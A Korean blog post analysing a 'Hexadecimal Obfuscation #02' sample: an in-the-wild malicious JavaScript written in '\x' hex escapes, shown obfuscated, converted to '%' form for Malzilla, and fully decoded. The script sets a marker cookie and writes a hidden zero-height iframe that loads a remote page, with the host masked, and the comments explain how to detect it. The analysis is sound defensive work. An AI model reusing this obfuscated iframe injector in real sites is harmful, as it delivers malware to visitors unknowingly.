
Hexadecimal Obfuscation #02

category Analysis/JS Obfuscation 2013.06.19 18:34

두 번째 16진수 난독화 형태는 "\x" 이스케이프 형태입니다.

// Sample as found in the wild: every property name and string is written as
// "\x.." hex escapes so that "document", "cookie", "iframe" etc. never appear
// literally in the page source.  Decoded meaning per line is given below.
//
// L9: window["document"]["cookie"]["indexOf"]('nb229=') == -1
//     -> only run when the marker cookie "nb229=" is NOT yet set.
if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) {
    // new window["Date"]()
    var aWdHMqss1 = new window["\x44\x61\x74\x65"]();
    // setTime(getTime() + 12 * 60 * 60 * 1000): expiry = now + 12 hours (ms).
    aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() + 12 * 60 * 60 * 1000);
    // document.cookie = 'nb229=Yes;path=/;expires=' + toGMTString()
    // The cookie is a "already injected" flag, so the iframe below is written
    // at most once per 12-hour window per browser.
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = '\x6e\x62\x32\x32\x39\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d' + aWdHMqss1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
    // document.write("<iframe src='http://<masked host>/js/cookie.html'
    //                  width='116' height='0' frameborder='0'></iframe>")
    // A zero-height iframe is the delivery vector; the host is masked ("*")
    // by the post author.  \x27 decodes to a single quote, so all attribute
    // values are single-quoted.  For detection, the combination of
    // window["\x.."]-style member access, a marker cookie and document.write
    // of an iframe with height='0' is the pattern to flag.
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2f\x6a\x73\x2f\x63\x6f\x6f\x6b\x69\x65\x2e\x68\x74\x6d\x6c\x27 \x77\x69\x64\x74\x68\x3d\x27\x31\x31\x36\x27 \x68\x65\x69\x67\x68\x74\x3d\x27\x30\x27 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
}


"%" 형태의 16진수 난독화는 Malzilla에서 바로 풀리지만, "\x" 형태는 바로 풀리지 않기 때문에 아래와 같이 "\x"를 "%"로 치환한 뒤 디코딩하면 됩니다.

// Intermediate analysis artifact, NOT runnable code: every "\x" of the sample
// above has been replaced by "%" so that the strings become URL-encoded text
// that Malzilla's decoder understands.  In a real JS engine these "%.." keys
// would just be undefined property names; the listing exists only to be fed
// to the decoder, which yields the plain-text version that follows.
//
// Same structure as the original: guard on the absence of cookie "nb229=".
if (window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"]["%69%6e%64%65%78%4f%66"]('%6e%62%32%32%39%3d') == -1) {
    // new window["Date"]()
    var aWdHMqss1 = new window["%44%61%74%65"]();
    // setTime(getTime() + 12 h in ms)
    aWdHMqss1["%73%65%74%54%69%6d%65"](aWdHMqss1["%67%65%74%54%69%6d%65"]() + 12 * 60 * 60 * 1000);
    // document.cookie = 'nb229=Yes;path=/;expires=' + toGMTString()
    window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"] = '%6e%62%32%32%39%3d%59%65%73%3b%70%61%74%68%3d%2f%3b%65%78%70%69%72%65%73%3d' + aWdHMqss1["%74%6f%47%4d%54%53%74%72%69%6e%67"]();
    // document.write("<iframe src='http://<masked host>/js/cookie.html' width='116' height='0' frameborder='0'></iframe>")
    // Note %27 is a single quote (') — keep that in mind when reading the
    // decoded output, otherwise the attribute quoting looks wrong.
    window["%64%6f%63%75%6d%65%6e%74"]["%77%72%69%74%65"]("%3c%69%66%72%61%6d%65 %73%72%63%3d%27%68%74%74%70%3a%2f%2f%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2f%6a%73%2f%63%6f%6f%6b%69%65%2e%68%74%6d%6c%27 %77%69%64%74%68%3d%27%31%31%36%27 %68%65%69%67%68%74%3d%27%30%27 %66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e");
}


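// Fully decoded form of the "\x"-escaped sample above.  Kept as a literal
// decoding (bracket access, "==", the random variable name) so it can be
// compared 1:1 with the obfuscated listing; this is analysis output, not code
// meant to be reused.
//
// Behaviour: if the marker cookie "nb229=" is absent, set it for 12 hours and
// inject a zero-height iframe that loads <masked host>/js/cookie.html.  The
// cookie only throttles re-injection; the iframe is the actual loader.
if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
    // Expiry = now + 12 h (12 * 60 * 60 * 1000 ms).
    var aWdHMqss1 = new window["Date"]();
    aWdHMqss1["setTime"](aWdHMqss1["getTime"]() + 12 * 60 * 60 * 1000);
    window["document"]["cookie"] = 'nb229=Yes;path=/;expires=' + aWdHMqss1["toGMTString"]();
    // \x27 in the sample is a single quote, so the attribute values are
    // single-quoted (a double-quoted rendering would terminate the outer
    // string literal), and the decoded markup ends with "</iframe>".
    // The host is masked with "*" by the post author.
    window["document"]["write"]("<iframe src='http://****************/js/cookie.html' width='116' height='0' frameborder='0'></iframe>");
}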

* 실제 악성코드를 유포하는 소스코드의 샘플이기 때문에 일부 내용을 변경하였습니다.
